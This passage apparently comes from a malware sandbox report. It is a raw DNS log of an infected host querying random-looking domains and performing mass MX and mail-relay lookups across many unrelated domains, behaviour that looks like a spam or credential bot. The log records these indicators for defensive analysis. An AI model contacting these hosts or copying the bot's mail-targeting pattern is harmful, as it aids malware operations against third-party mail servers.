Dec 22, 2023 21:15:34.125647068 CET	192.168.2.4	1.1.1.1	0x7df3	Standard query (0)	relay.91069b3d854a1035.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.125705957 CET	192.168.2.4	1.1.1.1	0x7b24	Standard query (0)	ssh.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.126050949 CET	192.168.2.4	1.1.1.1	0xc3ec	Standard query (0)	pop.jiashi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.126178026 CET	192.168.2.4	1.1.1.1	0x7f06	Standard query (0)	relay.rdhppx.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.126533031 CET	192.168.2.4	1.1.1.1	0x5564	Standard query (0)	relay.263host.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.126533031 CET	192.168.2.4	1.1.1.1	0xb157	Standard query (0)	relay.sodataol.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.127094030 CET	192.168.2.4	1.1.1.1	0x2cc5	Standard query (0)	relay.souriahost.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.127094030 CET	192.168.2.4	1.1.1.1	0x5584	Standard query (0)	relay.hyiquu.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.127238035 CET	192.168.2.4	1.1.1.1	0xa650	Standard query (0)	relay.gpa.orgau	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.127418995 CET	192.168.2.4	1.1.1.1	0x3eec	Standard query (0)	relay.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.127620935 CET	192.168.2.4	1.1.1.1	0xf5c	Standard query (0)	relay.mywitce.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.127950907 CET	192.168.2.4	1.1.1.1	0xf4ff	Standard query (0)	relay.daystarbookscharity.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.128092051 CET	192.168.2.4	1.1.1.1	0xdb20	Standard query (0)	relay.djmeca.com.ca	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.293787956 CET	192.168.2.4	1.1.1.1	0x9252	Standard query (0)	yandfcorp-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.293838978 CET	192.168.2.4	1.1.1.1	0x452c	Standard query (0)	mail.intermountainmls.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.293900013 CET	192.168.2.4	1.1.1.1	0x43c9	Standard query (0)	davescheirer-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.293926954 CET	192.168.2.4	1.1.1.1	0x51ca	Standard query (0)	bethanyhomesnc-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.293967009 CET	192.168.2.4	1.1.1.1	0x4b19	Standard query (0)	ftp.mcammond.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.293988943 CET	192.168.2.4	1.1.1.1	0xbd33	Standard query (0)	mail.mailbox.lpl.org	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294004917 CET	192.168.2.4	1.1.1.1	0x8b0b	Standard query (0)	covicol-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294028044 CET	192.168.2.4	1.1.1.1	0xef4e	Standard query (0)	mail.jiashi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294043064 CET	192.168.2.4	1.1.1.1	0x3eec	Standard query (0)	relay.mobileuser.baihe.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294090033 CET	192.168.2.4	1.1.1.1	0x7b24	Standard query (0)	ssh.pmcsystem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294107914 CET	192.168.2.4	1.1.1.1	0xa42d	Standard query (0)	mail.loghole.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294131041 CET	192.168.2.4	1.1.1.1	0x14b4	Standard query (0)	pop.eddc.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294148922 CET	192.168.2.4	1.1.1.1	0xbe67	Standard query (0)	mail.keywordranker.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294193983 CET	192.168.2.4	1.1.1.1	0xc3ec	Standard query (0)	pop.jiashi.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294207096 CET	192.168.2.4	1.1.1.1	0xd9d1	Standard query (0)	ftp.thenile.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294239998 CET	192.168.2.4	1.1.1.1	0x1f12	Standard query (0)	ismaworld-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294249058 CET	192.168.2.4	1.1.1.1	0xba48	Standard query (0)	derrickandbriggs-com.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294270039 CET	192.168.2.4	1.1.1.1	0x1a74	Standard query (0)	mail.yuejichem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294343948 CET	192.168.2.4	1.1.1.1	0x4283	Standard query (0)	smtp.distraction.com.au	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294399023 CET	192.168.2.4	1.1.1.1	0xff73	Standard query (0)	racesystems-com-au.mail.protection.outlook.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:34.294409037 CET	192.168.2.4	1.1.1.1	0xa92	Standard query (0)	spool.mail.gandi.net	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:35.141408920 CET	192.168.2.4	1.1.1.1	0xf211	Standard query (0)	ftp.keywordranker.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:35.141410112 CET	192.168.2.4	1.1.1.1	0x7123	Standard query (0)	ftp.yuejichem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:35.312848091 CET	192.168.2.4	1.1.1.1	0x1a74	Standard query (0)	mail.yuejichem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:35.312848091 CET	192.168.2.4	1.1.1.1	0xbe67	Standard query (0)	mail.keywordranker.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:37.141743898 CET	192.168.2.4	1.1.1.1	0x7123	Standard query (0)	ftp.yuejichem.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:42.697730064 CET	192.168.2.4	1.1.1.1	0xae41	Standard query (0)	humydrole.com	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:42.875927925 CET	192.168.2.4	1.1.1.1	0xae41	Standard query (0)	humydrole.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 22, 2023 21:12:15.361978054 CET	1.1.1.1	192.168.2.4	0x410	Name error (3)	onualituyrs.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:15.515759945 CET	1.1.1.1	192.168.2.4	0x4fc0	No error (0)	sumagulituyo.org		34.94.245.237	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:16.599772930 CET	1.1.1.1	192.168.2.4	0x4f15	No error (0)	snukerukeutit.org		104.198.2.251	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:17.349942923 CET	1.1.1.1	192.168.2.4	0x9c99	No error (0)	lightseinsteniki.org		34.143.166.163	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:19.330048084 CET	1.1.1.1	192.168.2.4	0x2bf1	No error (0)	liuliuoumumy.org		34.143.166.163	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:20.628293991 CET	1.1.1.1	192.168.2.4	0x1eff	No error (0)	stualialuyastrelia.net		91.215.85.17	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:28.458642960 CET	1.1.1.1	192.168.2.4	0xe5fa	Name error (3)	dayfarrichjwclik.fun	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:28.589931965 CET	1.1.1.1	192.168.2.4	0xe0c0	No error (0)	neighborhoodfeelsa.fun		104.21.87.137	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:28.589931965 CET	1.1.1.1	192.168.2.4	0xe0c0	No error (0)	neighborhoodfeelsa.fun		172.67.143.130	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:29.249150991 CET	1.1.1.1	192.168.2.4	0x8eca	No error (0)	diagramfiremonkeyowwa.fun		104.21.18.224	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:29.249150991 CET	1.1.1.1	192.168.2.4	0x8eca	No error (0)	diagramfiremonkeyowwa.fun		172.67.183.217	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:32.849663019 CET	1.1.1.1	192.168.2.4	0x51d1	No error (0)	tablesockartfinewa.pw		104.21.85.41	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:32.849663019 CET	1.1.1.1	192.168.2.4	0x51d1	No error (0)	tablesockartfinewa.pw		172.67.202.69	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:33.670902967 CET	1.1.1.1	192.168.2.4	0xdbdd	Name error (3)	dayfarrichjwclik.fun	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578670979 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		196.188.169.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578670979 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		187.156.96.226	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578670979 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		187.211.8.246	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578670979 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		201.218.66.48	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578670979 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		2.180.10.7	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578670979 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		181.168.176.36	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578670979 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		175.120.254.9	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578670979 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		186.182.55.44	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578670979 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		211.119.84.112	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578670979 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		210.182.29.70	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578836918 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		196.188.169.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578836918 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		187.156.96.226	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578836918 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		187.211.8.246	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578836918 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		201.218.66.48	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578836918 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		2.180.10.7	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578836918 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		181.168.176.36	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578836918 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		175.120.254.9	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578836918 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		186.182.55.44	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578836918 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		211.119.84.112	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578836918 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		210.182.29.70	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578860044 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		196.188.169.138	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578860044 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		187.156.96.226	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578860044 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		187.211.8.246	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578860044 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		201.218.66.48	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578860044 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		2.180.10.7	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578860044 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		181.168.176.36	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578860044 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		175.120.254.9	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578860044 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		186.182.55.44	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578860044 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		211.119.84.112	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:34.578860044 CET	1.1.1.1	192.168.2.4	0x6060	No error (0)	ftpvoyager.cc		210.182.29.70	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:37.499687910 CET	1.1.1.1	192.168.2.4	0x83c9	No error (0)	shpilliwilli.com		172.67.215.49	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:37.499687910 CET	1.1.1.1	192.168.2.4	0x83c9	No error (0)	shpilliwilli.com		104.21.45.142	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:38.498013973 CET	1.1.1.1	192.168.2.4	0xe595	No error (0)	linkofstrumble.com		172.67.185.93	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:38.498013973 CET	1.1.1.1	192.168.2.4	0xe595	No error (0)	linkofstrumble.com		104.21.88.149	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:42.697288036 CET	1.1.1.1	192.168.2.4	0x9db	No error (0)	cream.hitsturbo.com		104.21.46.59	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:12:42.697288036 CET	1.1.1.1	192.168.2.4	0x9db	No error (0)	cream.hitsturbo.com		172.67.168.30	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:13:03.689270020 CET	1.1.1.1	192.168.2.4	0x215b	No error (0)	humydrole.com		2.180.10.7	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:13:03.689270020 CET	1.1.1.1	192.168.2.4	0x215b	No error (0)	humydrole.com		185.12.79.25	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:13:03.689270020 CET	1.1.1.1	192.168.2.4	0x215b	No error (0)	humydrole.com		186.182.55.44	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:13:03.689270020 CET	1.1.1.1	192.168.2.4	0x215b	No error (0)	humydrole.com		187.211.8.246	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:13:03.689270020 CET	1.1.1.1	192.168.2.4	0x215b	No error (0)	humydrole.com		211.53.230.67	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:13:03.689270020 CET	1.1.1.1	192.168.2.4	0x215b	No error (0)	humydrole.com		186.147.159.149	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:13:03.689270020 CET	1.1.1.1	192.168.2.4	0x215b	No error (0)	humydrole.com		189.232.1.60	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:13:03.689270020 CET	1.1.1.1	192.168.2.4	0x215b	No error (0)	humydrole.com		211.171.233.129	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:13:03.689270020 CET	1.1.1.1	192.168.2.4	0x215b	No error (0)	humydrole.com		190.187.52.42	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:13:03.689270020 CET	1.1.1.1	192.168.2.4	0x215b	No error (0)	humydrole.com		187.204.106.77	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:14:49.071535110 CET	1.1.1.1	192.168.2.4	0xc22e	Name error (3)	e-manage.us	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.076762915 CET	1.1.1.1	192.168.2.4	0x99c7	No error (0)	bethanyhomesnc.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.080686092 CET	1.1.1.1	192.168.2.4	0x3d11	Name error (3)	hoefakker.org	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.082523108 CET	1.1.1.1	192.168.2.4	0x3d2a	Name error (3)	souriahost.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.082585096 CET	1.1.1.1	192.168.2.4	0x1170	Name error (3)	jesusanswwers.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.083439112 CET	1.1.1.1	192.168.2.4	0xc671	Name error (3)	263host.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.083982944 CET	1.1.1.1	192.168.2.4	0x6f25	Name error (3)	acaiforcemaxweightloss.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.084861040 CET	1.1.1.1	192.168.2.4	0x5cc0	Name error (3)	dm.famm.us	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.085525036 CET	1.1.1.1	192.168.2.4	0x346d	Name error (3)	taylorbryant.com.au	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.086653948 CET	1.1.1.1	192.168.2.4	0xfbf	No error (0)	derrickandbriggs.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.086690903 CET	1.1.1.1	192.168.2.4	0xd670	Name error (3)	chemcaregroup.compg	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.089735031 CET	1.1.1.1	192.168.2.4	0xd45a	Name error (3)	dinfos.net	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.090867043 CET	1.1.1.1	192.168.2.4	0xba28	Name error (3)	dresslermd.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.091798067 CET	1.1.1.1	192.168.2.4	0x5732	Name error (3)	rdhppx.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.093954086 CET	1.1.1.1	192.168.2.4	0x7a67	No error (0)	smartiebritches.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.094896078 CET	1.1.1.1	192.168.2.4	0x9d74	Name error (3)	studnets.ocps.net	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.095608950 CET	1.1.1.1	192.168.2.4	0x74ce	Name error (3)	select-feeds.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.095745087 CET	1.1.1.1	192.168.2.4	0xf246	Name error (3)	bilfinger.comqa	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.096479893 CET	1.1.1.1	192.168.2.4	0x9f64	Name error (3)	firsteuropaglobal.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.099231958 CET	1.1.1.1	192.168.2.4	0x1f0f	Name error (3)	saskgmail.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.099272013 CET	1.1.1.1	192.168.2.4	0xe0b3	Name error (3)	aurora-resorts.com.au	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.099330902 CET	1.1.1.1	192.168.2.4	0x8d41	Name error (3)	rio-perfume.orgua	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.099342108 CET	1.1.1.1	192.168.2.4	0xb523	No error (0)	theproducebox.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.099342108 CET	1.1.1.1	192.168.2.4	0xb523	No error (0)	theproducebox.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.099342108 CET	1.1.1.1	192.168.2.4	0xb523	No error (0)	theproducebox.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.099342108 CET	1.1.1.1	192.168.2.4	0xb523	No error (0)	theproducebox.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.099342108 CET	1.1.1.1	192.168.2.4	0xb523	No error (0)	theproducebox.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.099565983 CET	1.1.1.1	192.168.2.4	0x75de	Name error (3)	cominex.com.au	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.100291014 CET	1.1.1.1	192.168.2.4	0xefd0	Name error (3)	djmeca.com.ca	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.101125956 CET	1.1.1.1	192.168.2.4	0x15ff	Name error (3)	vesond.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.101275921 CET	1.1.1.1	192.168.2.4	0x3365	Name error (3)	bopclip.org	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.101783991 CET	1.1.1.1	192.168.2.4	0xd5ce	No error (0)	cannaclear.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.101783991 CET	1.1.1.1	192.168.2.4	0xd5ce	No error (0)	cannaclear.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.101783991 CET	1.1.1.1	192.168.2.4	0xd5ce	No error (0)	cannaclear.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.101783991 CET	1.1.1.1	192.168.2.4	0xd5ce	No error (0)	cannaclear.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.101783991 CET	1.1.1.1	192.168.2.4	0xd5ce	No error (0)	cannaclear.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.102103949 CET	1.1.1.1	192.168.2.4	0x268d	Name error (3)	gn.ais.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.102821112 CET	1.1.1.1	192.168.2.4	0x729f	Name error (3)	earnmagabucks.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.104619026 CET	1.1.1.1	192.168.2.4	0x658e	Name error (3)	mercor.compl	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.105777979 CET	1.1.1.1	192.168.2.4	0xa138	Name error (3)	sodataol.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.106442928 CET	1.1.1.1	192.168.2.4	0x4233	Name error (3)	hodginssmithconsulting.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.109468937 CET	1.1.1.1	192.168.2.4	0x2931	Name error (3)	integral-tours.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.110666990 CET	1.1.1.1	192.168.2.4	0xbb82	Name error (3)	hyiquu.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.112700939 CET	1.1.1.1	192.168.2.4	0x746c	Name error (3)	arbsdecq.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.112947941 CET	1.1.1.1	192.168.2.4	0xc62	Name error (3)	9a07f8a339ec2a3e.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.114320993 CET	1.1.1.1	192.168.2.4	0xda0d	No error (0)	vixej.com	traff-1.hugedomains.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:49.114320993 CET	1.1.1.1	192.168.2.4	0xda0d	No error (0)	traff-1.hugedomains.com	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 22, 2023 21:14:49.115721941 CET	1.1.1.1	192.168.2.4	0xc68d	Name error (3)	piiyuw.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.116322994 CET	1.1.1.1	192.168.2.4	0x9092	No error (0)	davescheirer.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.118453979 CET	1.1.1.1	192.168.2.4	0x26d	No error (0)	kegerators.net			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.118453979 CET	1.1.1.1	192.168.2.4	0x26d	No error (0)	kegerators.net			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.118525982 CET	1.1.1.1	192.168.2.4	0x3708	Name error (3)	enhancementsmast.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.121136904 CET	1.1.1.1	192.168.2.4	0xa514	Name error (3)	mywitce.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.121820927 CET	1.1.1.1	192.168.2.4	0x27ec	No error (0)	ismaworld.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.121973991 CET	1.1.1.1	192.168.2.4	0xe10e	No error (0)	fotoestudiomiret.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.123153925 CET	1.1.1.1	192.168.2.4	0x5e8	Name error (3)	sitehalogen.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.123502016 CET	1.1.1.1	192.168.2.4	0x2589	Name error (3)	154892628.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.126666069 CET	1.1.1.1	192.168.2.4	0xf4f8	Name error (3)	nhclex.org	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.129699945 CET	1.1.1.1	192.168.2.4	0x28d9	Name error (3)	asdfhjlasdfhjlk1.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.132600069 CET	1.1.1.1	192.168.2.4	0x1b6f	No error (0)	aldine.org.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.134828091 CET	1.1.1.1	192.168.2.4	0x6c9a	Name error (3)	djaskdas.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.135029078 CET	1.1.1.1	192.168.2.4	0xa4ea	No error (0)	yandfcorp.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.136496067 CET	1.1.1.1	192.168.2.4	0x6476	Name error (3)	freedhal.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.137095928 CET	1.1.1.1	192.168.2.4	0x65fd	Name error (3)	nsorekek.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.140278101 CET	1.1.1.1	192.168.2.4	0xfabb	No error (0)	harrell-associates.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.140295982 CET	1.1.1.1	192.168.2.4	0xb7f8	No error (0)	saltdelcolom.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.143382072 CET	1.1.1.1	192.168.2.4	0xfa2f	No error (0)	intermountainmls.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.143382072 CET	1.1.1.1	192.168.2.4	0xfa2f	No error (0)	intermountainmls.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.143654108 CET	1.1.1.1	192.168.2.4	0x9a85	Name error (3)	hermanassociatesnewyork.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.145059109 CET	1.1.1.1	192.168.2.4	0x6b0b	Name error (3)	mobile.baihe.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.145529985 CET	1.1.1.1	192.168.2.4	0x2bc4	Name error (3)	91069b3d854a1035.com	none	none	MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.148972988 CET	1.1.1.1	192.168.2.4	0x9c2e	No error (0)	shapeab.com			MX (Mail exchange)	IN (0x0001)	false
Dec 22, 2023 21:14:49.149188042 CET	1.1.1.1	192.168.2.4	0xa25b	No error (0)	ireland-ventures.com			MX (Mail exchange)	IN (0x0001)	false
